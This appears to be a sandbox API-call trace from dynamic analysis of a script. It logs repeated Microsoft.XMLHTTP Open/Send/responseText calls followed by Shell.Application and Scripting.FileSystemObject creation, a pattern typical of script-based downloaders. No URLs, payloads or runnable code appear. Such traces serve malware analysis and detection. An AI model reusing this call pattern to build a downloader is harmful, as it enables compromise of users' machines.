	[0584.650] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0584.650] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0584.650] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0584.650] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0584.650] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0584.650] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0584.650] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0584.650] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0584.651] SysStringLen (param_1=0x0) returned 0x0
	[0584.651] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0584.651] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0584.651] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0584.651] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0584.651] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0584.651] ??2@YAPEAX_K@Z () returned 0x62f330
	[0584.651] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0584.651] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0584.651] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0584.651] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0584.651] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0584.651] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0584.651] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0584.652] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0584.652] longjmp () 
	[0584.652] longjmp () 
	[0584.652] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0584.652] SysStringLen (param_1=0x0) returned 0x0
	[0584.652] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0584.652] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0584.652] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0584.652] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0584.652] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0584.652] ??2@YAPEAX_K@Z () returned 0x62f310
	[0584.653] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0584.653] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0584.653] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0584.653] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0584.653] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0584.653] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0584.653] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0584.653] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0584.653] longjmp () 
	[0584.653] longjmp () 
	[0584.654] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0584.654] SysStringLen (param_1=0x0) returned 0x0
	[0584.654] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0584.654] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0584.654] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0584.654] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0584.654] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0584.654] ??2@YAPEAX_K@Z () returned 0x62f330
	[0584.654] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0584.654] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0584.654] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0584.654] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0584.654] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0584.655] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0584.655] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0584.655] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0584.655] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0584.655] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0584.655] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0586.905] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0586.905] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0586.905] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0586.905] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0586.906] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0586.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0586.906] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0586.906] SysStringLen (param_1=0x0) returned 0x0
	[0586.906] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0586.906] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0586.906] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0586.906] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0586.906] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0586.907] ??2@YAPEAX_K@Z () returned 0x62f350
	[0586.907] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0586.907] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0586.907] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0586.907] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0586.907] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0586.907] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0586.907] SysStringLen (param_1=0x0) returned 0x0
	[0586.907] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0586.911] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0586.911] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0586.911] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0586.911] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0586.911] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0586.911] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0588.828] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0588.828] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0588.828] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0588.829] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0588.829] SysStringLen (param_1=0x0) returned 0x0
	[0588.829] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0588.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0588.830] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0588.830] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0588.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0588.830] ??2@YAPEAX_K@Z () returned 0x62f330
	[0588.830] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
